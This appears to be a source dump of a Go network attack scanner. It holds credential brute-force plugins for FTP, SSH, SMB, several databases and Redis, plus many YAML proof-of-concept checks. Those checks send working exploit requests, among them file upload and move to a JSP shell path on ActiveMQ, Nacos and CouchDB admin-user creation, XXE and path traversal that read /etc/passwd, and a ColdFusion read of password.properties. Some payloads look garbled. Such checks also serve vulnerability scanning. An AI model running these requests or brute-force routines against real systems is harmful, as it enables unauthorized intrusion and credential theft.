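	INVALID_PASS:     "旧密码错误",         // old password is wrong
	INVALID_DIFFPASS: "两次新密码不一致",   // the two new passwords do not match
	INVALID_FINGER:   "需要去掉指纹尾部逗号", // remove the trailing comma from the fingerprint

	ERROR_CRON_SPEC: "crontab语法错误", // crontab syntax error
}

// GetMsg returns the message registered for code.
// Unknown codes fall back to the generic ERROR message so callers never
// receive an empty string.
func GetMsg(code int) string {
	if msg, ok := MsgFlags[code]; ok {
		return msg
	}
	return MsgFlags[ERROR]
}
--------------------------------------------------------------------------------
/pkg/jobs/cron.go:
--------------------------------------------------------------------------------
package jobs

import (
	"sync"

	"github.com/robfig/cron/v3"
)

var (
	// mainCron is the single scheduler shared by the whole process; it is
	// started in init and never stopped.
	mainCron *cron.Cron
	// workPool is created here but not referenced in this file; presumably
	// consumed by the job runner elsewhere in the package.
	workPool chan bool
	// lock serializes AddJob's check-then-add (and RemoveJob) so that two
	// concurrent callers cannot both schedule the same job id.
	lock sync.Mutex
)

func init() {
	workPool = make(chan bool, 10)
	mainCron = cron.New()
	mainCron.Start()
}

// AddJob schedules job under the cron expression spec.
//
// It returns false when a job with the same id is already scheduled, or when
// spec is not a valid expression; the parse error itself is not exposed by
// this bool interface, so callers that need to report a bad spec should
// validate it beforehand (cf. e.ERROR_CRON_SPEC). Duplicate detection and the
// insert happen under lock so concurrent callers cannot add the same job twice.
func AddJob(spec string, job *Job) bool {
	lock.Lock()
	defer lock.Unlock()

	// Already scheduled: refuse rather than create a second entry.
	if GetEntryById(job.id) != nil {
		return false
	}
	_, err := mainCron.AddJob(spec, job)
	return err == nil
}

// RemoveJob unschedules the job with the given id; it is a no-op when no such
// job exists. The lock keeps add/remove of the same id serialized with AddJob.
func RemoveJob(id int) {
	lock.Lock()
	defer lock.Unlock()

	if entry := GetEntryById(id); entry != nil {
		mainCron.Remove(entry.ID)
	}
}

// GetEntryById returns a copy of the scheduler entry whose Job is a *Job with
// the given id, or nil when none is scheduled. Entries are matched on the
// original Job value stored by cron, not on the wrapped job.
func GetEntryById(id int) *cron.Entry {
	for _, en := range mainCron.Entries() {
		if j, ok := en.Job.(*Job); ok && j.id == id {
			entry := en // copy out of the loop variable before taking its address
			return &entry
		}
	}
	return nil
}
--------------------------------------------------------------------------------
/pkg/plugins/ftp.go:
--------------------------------------------------------------------------------
package plugins

import (
	"net"
	"time"

	"github.com/jlaffaye/ftp"
)

// ScanFtp tries a single username/password pair against the FTP server on
// ip:port. result is true only when the login is accepted; err carries the
// dial or login failure.
func ScanFtp(ip string, port string, username string, password string) (err error, result bool) {
	// JoinHostPort (instead of ip+":"+port) brackets IPv6 literals correctly.
	conn, err := ftp.DialTimeout(net.JoinHostPort(ip, port), 3*time.Second)
	if err != nil {
		return err, false
	}
	// Always tear the control connection down. The original only sent a
	// Logout on success, so every failed login leaked a socket for the whole
	// duration of a brute-force run.
	defer conn.Quit()

	if err = conn.Login(username, password); err != nil {
		return err, false
	}
	return nil, true
}
--------------------------------------------------------------------------------
/pkg/plugins/mongodb.go:
--------------------------------------------------------------------------------
package plugins

import (
	"net"
	"net/url"
	"time"

	"gopkg.in/mgo.v2"
)

// ScanMongodb checks a username/password pair against the admin database on
// ip:port (weak-password check). result is true when the credentials are
// accepted and serverStatus can be run with them.
func ScanMongodb(ip string, port string, username string, password string) (err error, result bool) {
	// Percent-encode the credentials: a ':', '@' or '/' in a wordlist
	// password would otherwise be parsed as URL structure and break (or
	// redirect) the connection. mgo percent-decodes user and password when
	// parsing the URL, so the pair reaches the server unchanged.
	uri := "mongodb://" + url.QueryEscape(username) + ":" + url.QueryEscape(password) +
		"@" + net.JoinHostPort(ip, port) + "/admin"

	session, err := mgo.DialWithTimeout(uri, 3*time.Second)
	if err != nil {
		return err, false
	}
	// Close unconditionally; the original only deferred Close after a
	// successful Ping and leaked the session when the ping failed.
	defer session.Close()

	// Surface the failure instead of returning (nil, false), which callers
	// cannot distinguish from "credentials rejected".
	if err = session.Ping(); err != nil {
		return err, false
	}
	if err = session.Run("serverStatus", nil); err != nil {
		return err, false
	}
	return nil, true
}

// MongoUnauth reports whether the MongoDB instance on ip:port answers
// serverStatus without any authentication (unauthorized-access check).
func MongoUnauth(ip string, port string) (err error, result bool) {
	// Same 3 s bound as the other plugins; mgo.Dial's own default is longer.
	session, err := mgo.DialWithTimeout(net.JoinHostPort(ip, port), 3*time.Second)
	if err != nil {
		return err, false
	}
	defer session.Close() // the original never closed this session

	if err = session.Run("serverStatus", nil); err != nil {
		return err, false
	}
	return nil, true
}
--------------------------------------------------------------------------------
/pkg/plugins/mssql.go:
--------------------------------------------------------------------------------
package plugins

import (
	"database/sql"
	"net"
	"net/url"

	_ "github.com/denisenkom/go-mssqldb"
)

// ScanMssql checks a username/password pair against the SQL Server on
// ip:port by opening a connection to the master database and pinging it.
func ScanMssql(ip string, port string, username string, password string) (err error, result bool) {
	// Build the DSN in URL form. The ADO-style "key=value;..." string the
	// original concatenated had no escaping, so a ';' or '=' inside a
	// wordlist password could truncate the string or inject extra connection
	// parameters. url.UserPassword escapes the credentials; go-mssqldb
	// accepts the sqlserver:// form under either of its driver names.
	q := url.Values{}
	q.Set("database", "master")
	q.Set("dial timeout", "3")       // seconds, TCP connect (driver default is 15)
	q.Set("connection timeout", "3") // seconds, login/handshake (driver default is none)
	dsn := url.URL{
		Scheme:   "sqlserver",
		User:     url.UserPassword(username, password),
		Host:     net.JoinHostPort(ip, port),
		RawQuery: q.Encode(),
	}

	db, err := sql.Open("mssql", dsn.String())
	if err != nil {
		return err, false
	}
	defer db.Close()

	// sql.Open does not connect; Ping is where the credentials are checked.
	if err = db.Ping(); err != nil {
		return err, false
	}
	return nil, true
}
--------------------------------------------------------------------------------
/pkg/plugins/mysql.go:
--------------------------------------------------------------------------------
package plugins

import (
	"database/sql"
	"fmt"
	"net"
	"time"
	//_ "github.com/go-sql-driver/mysql"
	//_ "github.com/netxfly/mysql"
)

// ScanMysql checks a username/password pair against the MySQL server on
// ip:port. result is true when a connection can be opened and pinged.
//
// NOTE(review): both candidate driver imports above are commented out. Unless
// a "mysql" driver is registered elsewhere in the build, sql.Open fails with
// an unknown-driver error and every pair is reported as a miss.
func ScanMysql(ip string, port string, username string, password string) (err error, result bool) {
	// The original formatted the time.Duration with %d, producing
	// "timeout=3000000000s" (the value in nanoseconds, then a unit), which is
	// effectively no connect timeout. %s renders the Duration as "3s".
	// go-sql-driver parses this DSN structurally (last '/' then last '@'),
	// so the credentials are not percent-encoded here.
	connStr := fmt.Sprintf("%s:%s@tcp(%s)/?timeout=%s", username, password, net.JoinHostPort(ip, port), 3*time.Second)

	db, err := sql.Open("mysql", connStr)
	if err != nil {
		return err, false
	}
	defer db.Close() // once; the original deferred it twice

	if err = db.Ping(); err != nil {
		return err, false
	}
	return nil, true
}
--------------------------------------------------------------------------------
/pkg/plugins/plugins.go:
--------------------------------------------------------------------------------
package plugins

// ScanFunc is the signature every credential-check plugin implements: try one
// username/password pair against ip:port. result is true when the pair is
// accepted; err carries the transport or authentication failure. (The error is
// returned first, unlike the usual Go order; the signature is kept as-is
// because the brute-force task code calls through this type.)
type ScanFunc func(ip string, port string, username string, password string) (err error, result bool)

var (
	// ScanFuncMap maps the service name used by brute-force tasks to its plugin.
	ScanFuncMap map[string]ScanFunc
)

func init() {
	ScanFuncMap = map[string]ScanFunc{
		"FTP":        ScanFtp,
		"SSH":        ScanSsh,
		"SMB":        ScanSmb, // 139,445 — ScanSmb must honor the port argument for 139 to be meaningful
		"MSSQL":      ScanMssql,
		"MYSQL":      ScanMysql,
		"POSTGRESQL": ScanPostgres, // 5432
		"REDIS":      ScanRedis,
		"MONGOD":     ScanMongodb, // 27017
	}

	// Not wired up (kept as the original author's to-do list):
	//ScanFuncMap["ELASTICSEARCH"] = ScanElastic
	//ScanFuncMap["JAVADEBUG"] = JavaDebug // 9091
	//ScanFuncMap["ORACLE"] = ScanOracle // 1521
	//
	// 161 SNMP: SNMP manages network devices and the applications on them, so a
	// recovered community string is mainly useful for querying system information.
	// 4043 rsync
	// rfp
	// 2181 ZooKeeper: distributed coordination service, commonly holding system
	// configuration; an attacker can run every command meant for administrators only.
	// 8095 Atlassian Crowd
	// 8080 Elasticsearch
	// 8888 Jupyter Notebook
}
--------------------------------------------------------------------------------
/pkg/plugins/postgres.go:
--------------------------------------------------------------------------------
package plugins

import (
	"database/sql"
	"net"
	"net/url"

	_ "github.com/lib/pq"
)

// ScanPostgres checks a username/password pair against the PostgreSQL server
// on ip:port (database "postgres"). result is true when Ping succeeds.
func ScanPostgres(ip string, port string, username string, password string) (err error, result bool) {
	// Assemble the URL with net/url instead of Sprintf so that '@', '/',
	// '#', '%' or '?' in a wordlist password cannot change the URL structure;
	// lib/pq percent-decodes userinfo and query values when it parses the URL.
	q := url.Values{}
	// sslmode=disable means the credentials travel in the clear; acceptable
	// for a scanner that must also reach servers without TLS, but be aware of it.
	q.Set("sslmode", "disable")
	q.Set("connect_timeout", "3") // seconds; lib/pq otherwise waits indefinitely
	dsn := url.URL{
		Scheme:   "postgres",
		User:     url.UserPassword(username, password),
		Host:     net.JoinHostPort(ip, port),
		Path:     "/postgres",
		RawQuery: q.Encode(),
	}

	db, err := sql.Open("postgres", dsn.String())
	if err != nil {
		return err, false
	}
	defer db.Close()

	if err = db.Ping(); err != nil {
		return err, false
	}
	return nil, true
}
--------------------------------------------------------------------------------
/pkg/plugins/redis.go:
--------------------------------------------------------------------------------
package plugins

import (
	"net"
	"time"

	"github.com/go-redis/redis"
)

// ScanRedis checks whether password is accepted by the Redis server on
// ip:port. username is part of the common ScanFunc signature but is ignored:
// the go-redis version imported here (no /vN suffix) has no Username option,
// so only legacy requirepass authentication is tested, not Redis 6 ACL users.
//
// With an empty password the PING doubles as an unauthenticated-access probe.
// A server with no password configured rejects a non-empty AUTH, so such hosts
// only show up when the wordlist contains an empty password.
func ScanRedis(ip string, port string, username string, password string) (err error, result bool) {
	client := redis.NewClient(&redis.Options{
		Addr:     net.JoinHostPort(ip, port),
		Password: password,
		DB:       0,
		// Bound every phase, not just the dial, so a host that accepts the
		// TCP connection but never answers cannot stall the scan.
		DialTimeout:  3 * time.Second,
		ReadTimeout:  3 * time.Second,
		WriteTimeout: 3 * time.Second,
	})
	defer client.Close()

	if _, err = client.Ping().Result(); err != nil {
		return err, false
	}
	return nil, true
}
--------------------------------------------------------------------------------
/pkg/plugins/smb.go:
--------------------------------------------------------------------------------
package plugins

import (
	"fmt"
	"strconv"

	"github.com/stacktitan/smb/smb"
)

// ScanSmb checks a username/password pair against the SMB service on ip:port
// (no domain, no workstation). result mirrors the session's IsAuthenticated
// flag; err carries connection or negotiation failures.
func ScanSmb(ip string, port string, username string, password string) (err error, result bool) {
	// The original hard-coded Port: 445 and ignored the argument, so the 139
	// advertised in plugins.go was silently scanned on 445. Honor the port and
	// reject values that are not a TCP port instead of masking caller bugs.
	// NOTE(review): port 139 needs a NetBIOS session request before SMB; it is
	// not clear this library performs one, so confirm 139 results before trusting them.
	p, err := strconv.Atoi(port)
	if err != nil || p < 1 || p > 65535 {
		return fmt.Errorf("smb: invalid port %q", port), false
	}

	options := smb.Options{
		Host:        ip,
		Port:        p,
		User:        username,
		Password:    password,
		Domain:      "",
		Workstation: "",
	}

	// NOTE(review): unlike the other plugins there is no 3 s bound here;
	// smb.NewSession appears to dial without a deadline, so a silent host
	// stalls this check until the OS connect timeout.
	session, err := smb.NewSession(options, false)
	if err != nil {
		return err, false
	}
	defer session.Close()

	return nil, session.IsAuthenticated
}
--------------------------------------------------------------------------------
/pkg/plugins/ssh.go:
--------------------------------------------------------------------------------
package plugins

import (
	"net"
	"time"

	"golang.org/x/crypto/ssh"
)

// ScanSsh checks a username/password pair against the SSH server on ip:port.
// result is true only when authentication succeeds AND a session can run a
// command; err carries the dial, auth, session or exec failure.
//
// Operational note: on success this executes `echo xsec` on the target, which
// will appear in its auth and shell logs.
func ScanSsh(ip string, port string, username string, password string) (err error, result bool) {
	config := &ssh.ClientConfig{
		User: username,
		Auth: []ssh.AuthMethod{
			ssh.Password(password),
		},
		// Host keys are deliberately not verified: this is a credential
		// scanner talking to arbitrary targets, not a client that needs
		// MITM protection. The named helper makes that intent explicit.
		HostKeyCallback: ssh.InsecureIgnoreHostKey(),
		// Bounds the TCP connect only; the SSH handshake and auth exchange
		// have no deadline of their own.
		Timeout: 3 * time.Second,
	}

	client, err := ssh.Dial("tcp", net.JoinHostPort(ip, port), config)
	if err != nil {
		return err, false
	}
	defer client.Close()

	// The original declared `session, err :=` inside the if-block (shadowing
	// the named err) and deferred session.Close() before checking the error:
	// a refused session left session nil and panicked on Close, and a
	// NewSession error was never reported. Check first, then defer.
	session, err := client.NewSession()
	if err != nil {
		return err, false
	}
	defer session.Close()

	// Running a command proves the account can execute, not merely
	// authenticate (some servers accept the password but deny sessions).
	if err = session.Run("echo xsec"); err != nil {
		return err, false
	}
	return nil, true
}
--------------------------------------------------------------------------------
/pkg/pocs/activemq-cve-2016-3088.yml:
--------------------------------------------------------------------------------
# NOTE(review): the `{(unknown)}` placeholders below and the empty named group in
# `search` are extraction artifacts of this listing (the variable `filename` is
# declared in `set` but never referenced); they are not the upstream POC text.
name: poc-yaml-activemq-cve-2016-3088
set:
  filename: randomLowercase(6)
  fileContent: randomLowercase(6)
rules:
  - method: PUT
    path: /fileserver/{(unknown)}.txt
    body: |
      {{fileContent}}
    expression: |
      response.status == 204
  - method: GET
    path: /admin/test/index.jsp
    search: |
      activemq.home=(?P.*?),
    follow_redirects: false
    expression: |
      response.status == 200
  - method: MOVE
    path: /fileserver/{(unknown)}.txt
    headers:
      Destination: "file://{{home}}/webapps/api/{(unknown)}.jsp"
    follow_redirects: false
    expression: |
      response.status == 204
  - method: GET
    path: /api/{(unknown)}.jsp
    follow_redirects: false
    expression: |
      response.status == 200 && response.body.bcontains(bytes(fileContent))
detail:
  author: j4ckzh0u(https://github.com/j4ckzh0u)
  links:
    - https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2016-3088

--------------------------------------------------------------------------------
/pkg/pocs/activemq-default-password.yml:
--------------------------------------------------------------------------------
name: poc-yaml-activemq-default-password
rules:
  - method: GET
    path: /admin/
    expression: |
      response.status == 401 && response.body.bcontains(b"Unauthorized")
  - method: GET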
8 | path: /admin/ 9 | headers: 10 | Authorization: Basic YWRtaW46YWRtaW4= 11 | expression: | 12 | response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"

Broker

") 13 | detail: 14 | author: pa55w0rd(www.pa55w0rd.online/) 15 | links: 16 | - https://blog.csdn.net/ge00111/article/details/72765210 17 | -------------------------------------------------------------------------------- /pkg/pocs/airflow-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-airflow-unauth 2 | rules: 3 | - method: GET 4 | path: /admin/ 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"Airflow - DAGs") && response.body.bcontains(b"

DAGs

") 7 | detail: 8 | author: pa55w0rd(www.pa55w0rd.online/) 9 | links: 10 | - http://airflow.apache.org/ 11 | -------------------------------------------------------------------------------- /pkg/pocs/alibaba-nacos-v1-auth-bypass.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-alibaba-nacos-v1-auth-bypass 2 | set: 3 | r1: randomLowercase(16) 4 | r2: randomLowercase(16) 5 | rules: 6 | - method: POST 7 | path: "/nacos/v1/auth/users?username={{r1}}&password={{r2}}" 8 | headers: 9 | User-Agent: Nacos-Server 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes("create user ok!")) 12 | - method: GET 13 | path: "/nacos/v1/auth/users?pageNo=1&pageSize=999" 14 | headers: 15 | User-Agent: Nacos-Server 16 | expression: | 17 | response.status == 200 && response.body.bcontains(bytes(r1)) 18 | - method: DELETE 19 | path: "/nacos/v1/auth/users?username={{r1}}" 20 | headers: 21 | User-Agent: Nacos-Server 22 | expression: | 23 | response.status == 200 && response.body.bcontains(bytes("delete user ok!")) 24 | detail: 25 | author: kmahyyg(https://github.com/kmahyyg) 26 | links: 27 | - https://github.com/alibaba/nacos/issues/4593 28 | -------------------------------------------------------------------------------- /pkg/pocs/apache-flink-upload-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-flink-upload-rce 2 | set: 3 | r1: randomLowercase(8) 4 | r2: randomLowercase(4) 5 | rules: 6 | - method: GET 7 | path: /jars 8 | follow_redirects: true 9 | expression: > 10 | response.status == 200 && response.content_type.contains("json") && 11 | response.body.bcontains(b"address") && response.body.bcontains(b"files") 12 | - method: POST 13 | path: /jars/upload 14 | headers: 15 | Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 16 | body: |- 17 | --8ce4b16b22b58894aa86c421e8759df3 18 | Content-Disposition: form-data; 
name="jarfile";filename="{{r2}}.jar" 19 | Content-Type:application/octet-stream 20 | 21 | {{r1}} 22 | --8ce4b16b22b58894aa86c421e8759df3-- 23 | 24 | follow_redirects: true 25 | expression: > 26 | response.status == 200 && response.content_type.contains("json") && 27 | response.body.bcontains(b"success") && response.body.bcontains(bytes(r2)) 28 | search: >- 29 | (?P([a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}_[a-z]{4}.jar)) 30 | - method: DELETE 31 | path: '/jars/{{filen}}' 32 | follow_redirects: true 33 | expression: | 34 | response.status == 200 35 | detail: 36 | author: timwhite 37 | links: 38 | - https://github.com/LandGrey/flink-unauth-rce 39 | -------------------------------------------------------------------------------- /pkg/pocs/apache-kylin-unauth-cve-2020-13937.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-kylin-unauth-cve-2020-13937 2 | rules: 3 | - method: GET 4 | path: /kylin/api/admin/config 5 | expression: | 6 | response.status == 200 && response.headers["Content-Type"].contains("application/json") && response.body.bcontains(b"config") && response.body.bcontains(b"kylin.metadata.url") 7 | detail: 8 | author: JingLing(github.com/shmilylty) 9 | links: 10 | - https://s.tencent.com/research/bsafe/1156.html 11 | -------------------------------------------------------------------------------- /pkg/pocs/apache-ofbiz-cve-2018-8033-xxe.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-ofbiz-cve-2018-8033-xxe 2 | rules: 3 | - method: POST 4 | path: /webtools/control/xmlrpc 5 | headers: 6 | Content-Type: application/xml 7 | body: >- 8 | ]>&disclose; 9 | follow_redirects: false 10 | expression: > 11 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) && response.content_type.contains("text/xml") 12 | detail: 13 | author: su(https://suzzz112113.github.io/#blog) 14 | links: 15 | - 
https://github.com/jamieparfet/Apache-OFBiz-XXE/blob/master/exploit.py -------------------------------------------------------------------------------- /pkg/pocs/apache-ofbiz-cve-2020-9496-xml-deserialization.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-ofbiz-cve-2020-9496-xml-deserialization 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: POST 6 | path: /webtools/control/xmlrpc 7 | headers: 8 | Content-Type: application/xml 9 | body: >- 10 | {{rand}}dwisiswant0 12 | follow_redirects: false 13 | expression: > 14 | response.status == 200 && response.body.bcontains(bytes("methodResponse")) && response.body.bcontains(bytes("No such service [" + string(rand))) 15 | detail: 16 | author: su(https://suzzz112113.github.io/#blog) 17 | links: 18 | - https://lists.apache.org/thread.html/r84ccbfc67bfddd35dced494a1f1cba504f49ac60a2a2ae903c5492c3%40%3Cdev.ofbiz.apache.org%3E 19 | - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb 20 | -------------------------------------------------------------------------------- /pkg/pocs/aspcms-backend-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-aspcms-backend-leak 2 | rules: 3 | - method: GET 4 | path: /plug/oem/AspCms_OEMFun.asp 5 | expression: | 6 | response.status == 200 && "")) && response.body.bcontains(b"citrix") 13 | detail: 14 | author: JingLing(https://hackfun.org/) 15 | links: 16 | - https://support.citrix.com/article/CTX276688 17 | - https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/ 18 | - https://dmaasland.github.io/posts/citrix.html 19 | -------------------------------------------------------------------------------- /pkg/pocs/citrix-cve-2020-8193-unauthorized.yml: -------------------------------------------------------------------------------- 1 | name: 
poc-yaml-citrix-cve-2020-8193-unauthorized 2 | set: 3 | user: randomLowercase(8) 4 | pass: randomLowercase(8) 5 | rules: 6 | - method: POST 7 | path: "/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1" 8 | headers: 9 | Content-Type: application/xml 10 | X-NITRO-USER: '{{user}}' 11 | X-NITRO-PASS: '{{pass}}' 12 | body: 13 | follow_redirects: false 14 | expression: > 15 | response.status == 406 && "(?i)SESSID=\\w{32}".bmatches(bytes(response.headers["Set-Cookie"])) 16 | detail: 17 | author: bufsnake(https://github.com/bufsnake) 18 | links: 19 | - https://github.com/PR3R00T/CVE-2020-8193-Citrix-Scanner/blob/master/scanner.py 20 | - https://blog.unauthorizedaccess.nl/2020/07/07/adventures-in-citrix-security-research.html 21 | -------------------------------------------------------------------------------- /pkg/pocs/citrix-xenmobile-cve-2020-8209.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-citrix-xenmobile-cve-2020-8209 2 | rules: 3 | - method: GET 4 | path: /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && "^root:[x*]:0:0:".bmatches(response.body) 8 | detail: 9 | author: B1anda0(https://github.com/B1anda0) 10 | links: 11 | - https://nvd.nist.gov/vuln/detail/CVE-2020-8209 12 | -------------------------------------------------------------------------------- /pkg/pocs/coldfusion-cve-2010-2861-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-coldfusion-cve-2010-2861-lfi 2 | rules: 3 | - method: GET 4 | path: >- 5 | /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && response.body.bcontains(b"rdspassword=") && response.body.bcontains(b"encrypted=") 9 | detail: 10 | version: 8.0, 8.0.1, 9.0, 9.0.1 and earlier versions 11 | 
author: sharecast 12 | links: 13 | - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 -------------------------------------------------------------------------------- /pkg/pocs/confluence-cve-2015-8399.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-confluence-cve-2015-8399 2 | rules: 3 | - method: GET 4 | path: /spaces/viewdefaultdecorator.action?decoratorName 5 | follow_redirects: false 6 | expression: response.status == 200 && response.body.bcontains(b"confluence-init.properties") && response.body.bcontains(b"View Default Decorator") 7 | detail: 8 | author: whynot(https://github.com/notwhy) 9 | links: 10 | - https://www.anquanke.com/vul/id/1150798 -------------------------------------------------------------------------------- /pkg/pocs/confluence-cve-2019-3396-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-confluence-cve-2019-3396-lfi 2 | rules: 3 | - method: POST 4 | path: /rest/tinymce/1/macro/preview 5 | headers: 6 | Content-Type: "application/json" 7 | Host: localhost 8 | Referer: http://localhost 9 | body: >- 10 | {"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"}}} 11 | follow_redirects: true 12 | expression: | 13 | response.status == 200 && response.body.bcontains(b"contextConfigLocation") 14 | detail: 15 | author: sharecast 16 | links: 17 | - https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396 -------------------------------------------------------------------------------- /pkg/pocs/consul-rexec-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-consul-rexec-rce 2 | rules: 3 | - method: GET 4 | path: /v1/agent/self 5 | expression: | 6 | response.body.bcontains(b"\"DisableRemoteExec\": false") 7 | detail: 8 | author: 
imlonghao(https://imlonghao.com/) 9 | links: 10 | - https://www.exploit-db.com/exploits/46073 11 | -------------------------------------------------------------------------------- /pkg/pocs/consul-service-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-consul-service-rce 2 | rules: 3 | - method: GET 4 | path: /v1/agent/self 5 | expression: | 6 | response.body.bcontains(b"\"EnableScriptChecks\": true") || response.body.bcontains(b"\"EnableRemoteScriptChecks\": true") 7 | detail: 8 | author: imlonghao(https://imlonghao.com/) 9 | links: 10 | - https://www.exploit-db.com/exploits/46074 11 | -------------------------------------------------------------------------------- /pkg/pocs/coremail-cnvd-2019-16798.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-coremail-cnvd-2019-16798 2 | rules: 3 | - method: GET 4 | path: >- 5 | /mailsms/s?func=ADMIN:appState&dumpConfig=/ 6 | follow_redirects: false 7 | expression: > 8 | response.status == 200 && response.body.bcontains(bytes("")) 9 | detail: 10 | author: cc_ci(https://github.com/cc8ci) 11 | links: 12 | - https://www.secpulse.com/archives/107611.html -------------------------------------------------------------------------------- /pkg/pocs/couchcms-cve-2018-7662.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-couchcms-cve-2018-7662 2 | rules: 3 | - method: GET 4 | path: /includes/mysql2i/mysql2i.func.php 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"mysql2i.func.php on line 10") && response.body.bcontains(b"Fatal error: Cannot redeclare mysql_affected_rows() in") 8 | - method: GET 9 | path: /addons/phpmailer/phpmailer.php 10 | follow_redirects: false 11 | expression: > 12 | response.status == 200 && response.body.bcontains(b"phpmailer.php on line 10") && response.body.bcontains(b"Fatal error: Call to 
a menber function add_event_listener() on a non-object in") 13 | detail: 14 | author: we1x4n(https://we1x4n.github.io/) 15 | links: 16 | - https://github.com/CouchCMS/CouchCMS/issues/46 17 | -------------------------------------------------------------------------------- /pkg/pocs/couchdb-cve-2017-12635.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-couchdb-cve-2017-12635 2 | set: 3 | r1: randomLowercase(32) 4 | rules: 5 | - method: PUT 6 | path: '/_users/org.couchdb.user:{{r1}}' 7 | headers: 8 | Content-Type: application/json 9 | Content-Length: '192' 10 | body: |- 11 | { 12 | "type": "user", 13 | "name": "{{r1}}", 14 | "roles": ["_admin"], 15 | "roles": [], 16 | "password": "fVyuyAECgYEAhgJzkPO1sTV1Dvs5bvls4tyVAsLy2I7wHKWJvJdDUpox2TnCMFT9" 17 | } 18 | follow_redirects: false 19 | expression: | 20 | response.status == 201 && response.body.bcontains(bytes("org.couchdb.user:" + r1)) 21 | detail: 22 | author: j4ckzh0u(https://github.com/j4ckzh0u) 23 | links: 24 | - https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635 25 | -------------------------------------------------------------------------------- /pkg/pocs/couchdb-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-couchdb-unauth 2 | rules: 3 | - method: GET 4 | path: /_config 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"httpd_design_handlers") && response.body.bcontains(b"external_manager") && response.body.bcontains(b"replicator_manager") 8 | detail: 9 | author: FiveAourThe(https://github.com/FiveAourThe) 10 | links: 11 | - https://www.seebug.org/vuldb/ssvid-91597 -------------------------------------------------------------------------------- /pkg/pocs/craftcms-seomatic-cve-2020-9757-rce.yml: -------------------------------------------------------------------------------- 1 | name: 
poc-yaml-craftcms-seomatic-cve-2020-9757-rce 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | groups: 6 | poc1: 7 | - method: GET 8 | path: /actions/seomatic/meta-container/meta-link-container/?uri={{{{r1}}*'{{r2}}'}} 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2))) 11 | poc2: 12 | - method: GET 13 | path: /actions/seomatic/meta-container/all-meta-containers?uri={{{{r1}}*'{{r2}}'}} 14 | expression: | 15 | response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2))) 16 | detail: 17 | author: x1n9Qi8 18 | links: 19 | - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202003-181 20 | - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9757 21 | -------------------------------------------------------------------------------- /pkg/pocs/dedecms-carbuyaction-fileinclude.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-carbuyaction-fileinclude 2 | rules: 3 | - method: GET 4 | path: /plus/carbuyaction.php?dopost=return&code=../../ 5 | headers: 6 | Cookie: code=alipay 7 | follow_redirects: true 8 | expression: | 9 | response.status == 200 10 | - method: GET 11 | path: /plus/carbuyaction.php?dopost=return&code=../../ 12 | headers: 13 | Cookie: code=cod 14 | follow_redirects: true 15 | expression: | 16 | response.status == 200 && response.body.bcontains(bytes("Cod::respond()")) 17 | 18 | detail: 19 | author: harris2015(https://github.com/harris2015) 20 | Affected Version: "DedeCmsV5.x" 21 | links: 22 | - https://www.cnblogs.com/milantgh/p/3615986.html 23 | -------------------------------------------------------------------------------- /pkg/pocs/dedecms-cve-2018-6910.yml: 
